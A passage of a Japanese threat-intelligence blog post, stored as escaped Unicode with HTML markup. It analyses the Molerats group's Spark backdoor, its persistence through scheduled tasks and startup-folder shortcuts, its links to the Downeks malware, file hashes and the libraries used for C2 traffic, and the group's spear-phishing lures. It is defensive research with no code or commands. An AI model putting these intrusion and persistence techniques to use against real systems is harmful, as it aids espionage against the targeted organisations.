      \u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf<\/td>\n\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9<\/td>\n\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9<\/td>\n\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d<\/td>\n<\/tr>\n
      \u6c38\u7d9a\u5316<\/td>\n\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af<\/td>\n@StartupDir\u306eLNK\u306e\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8<\/td>\n@StartupDir\u306e\u30b3\u30d4\u30fc\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3001\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
      \u88686. 2019\u5e741\u6708\u30012019\u5e7410\u6708\u30012019\u5e7411\u6708\u30012020\u5e741\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u6bd4\u8f03<\/em><\/span><\/p>\n
      <\/a>Downeks\u3078\u306e\u63a5\u7d9a<\/h2>\n
      Kaspersky\u306e\u30ec\u30dd\u30fc\u30c8<\/a>\u306f\u3001Molerats\u306e\u30b5\u30d6\u30b0\u30eb\u30fc\u30d7(\u5225\u540dthe Gaza Cybergang)\u304c\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u914d\u5e03\u3057\u305fOperation Parliament\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u884c\u3063\u3066\u3044\u308b\u3068\u8ff0\u3079\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304cDustySky\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067Downeks\u3092\u914d\u5e03\u3057\u3066\u3044\u308b<\/a>\u3053\u3068\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u307e\u305f\u3001\u958b\u767a\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u306e\u9762\u3067\u306f\u3001Spark\u3068Downeks\u306b\u3044\u304f\u3064\u304b\u306e\u985e\u4f3c\u70b9\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002<\/p>\n
      \u4f8b\u3048\u3070\u3001\u540c\u3058\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u304a\u3068\u308a\u6587\u66f8\u3092\u958b\u304f\u305f\u3081\u3068\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u60aa\u610f\u306e\u3042\u308b\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u3042\u308a\u30011\u3064\u306fDowneks\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3001\u4ed6\u306e2\u3064\u306fSpark\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002Downeks\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u30012015\u5e7412\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306e\u30d6\u30ed\u30b0<\/a>\u3067\u8ff0\u3079\u305f\u3088\u3046\u306bDustySky\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u307e\u3057\u305f(SHA256: 75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9)\u3002\u307e\u305f\u3001\u79c1\u305f\u3061\u306f\u3001Spark\u30b5\u30f3\u30d7\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3053\u306e\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e\u30b5\u30f3\u30d7\u30eb\u30922\u3064\u6301\u3063\u3066\u3044\u307e\u3059\u30022017\u5e7411\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u3082\u306e(SHA256:4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85)\u30682018\u5e744\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u3082\u306e(SHA256:23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c)\u3067\u3059\u3002<\/p>\n
      \u958b\u767a\u9762\u3067\u306f\u3001Downeks\u3068Spark\u306e\u3069\u3061\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3082\u3001GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a\u3044\u304f\u3064\u304b\u306e\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9 \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304a\u3088\u3073\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306eC2\u901a\u4fe1\u3092\u5b9f\u884c\u3057\u3001JSON\u5185\u306b\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u307e\u3059\u3002\u7b2c\u4e00\u306b\u3001Spark\u306fC2\u901a\u4fe1\u306bcURL\u30e9\u30a4\u30d6\u30e9\u30ea\u3001\u5177\u4f53\u7684\u306b\u306f\u3001\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u3092GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a<\/a>\u30d0\u30fc\u30b8\u30e7\u30f37.56.0-DEV\u3092\u4f7f\u7528\u3057\u3001Downeks (SHA256:9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7)\u306fC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u306bcURL\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u304c\u3001\u305d\u308c\u306f\u3082\u3063\u3068\u53e4\u3044\u30d0\u30fc\u30b8\u30e7\u30f3(7.39.0)\u3067\u3057\u305f\u3002\u7b2c\u4e8c\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306fJSON\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3092\u89e3\u6790\u3057\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u69cb\u9020\u5316\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u306f\u3001GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a<\/a>JSON for Modern C++ Version 2.1.1\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u524d\u306b\u5ef6\u3079\u305fDowneks\u3082\u3001JSON\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3092\u89e3\u6790\u3057\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u5834\u5408\u306f\u3001GitHub\u304b\u3089\u81ea\u7531\u306b\u5165\u624b\u53ef\u80fd\u306a<\/a>Tencent's RapidJSON\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001Spark\u306e\u958b\u767a\u8005\u304cSpark\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3054\u3068\u306b\u7570\u306a\u308bJSON\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3001\u3068\u3044\u3046\u4ee5\u524d\u306e\u79c1\u305f\u3061\u306e\u89b3\u6e2c\u306b\u5408\u81f4\u3057\u307e\u3059\u3002<\/p>\n
      <\/a>\u7d50\u8ad6<\/h2>\n
      Molerats\u306f\u3001Gaza Hacking Team\u3001Gaza Cybergang\u3068\u3082\u547c\u3070\u308c\u30012019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u306b\u304b\u3051\u3066\u3001\u653f\u5e9c\u3001\u901a\u4fe1\u4e8b\u696d\u8005\u3001\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c\u3068\u3044\u3063\u305f6\u30ab\u56fd\u306b\u304a\u3051\u308b8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u60aa\u610f\u306e\u3042\u308bWord\u304a\u3088\u3073PDF\u306e\u4e21\u65b9\u306e\u6587\u66f8\u3092\u914d\u5e03\u3057\u3001\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u8106\u5f31\u6027\u3092\u6d3b\u7528\u3059\u308b\u4ee3\u308f\u308a\u306b\u88ab\u5bb3\u8005\u304c\u611f\u67d3\u3059\u308b\u3088\u3046\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3092\u8a66\u307f\u307e\u3059\u3002\u307e\u305f\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u653b\u6483\u3067Spark\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u4f7f\u7528\u3057\u307e\u3059\u304c\u3001\u91cd\u8981\u306a\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u3066C2\u901a\u4fe1\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306b\u3001\u81ea\u7531\u306b\u5165\u624b\u53ef\u80fd\u306a\u3055\u307e\u3056\u307e\u306a\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3053\u306e\u30c4\u30fc\u30eb\u306e\u958b\u767a\u3092\u7d9a\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n
      \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u4ee5\u4e0b\u306b\u3088\u3063\u3066\u3053\u306e\u30d6\u30ed\u30b0\u3067\u8aac\u660e\u3057\u305f\u653b\u6483\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n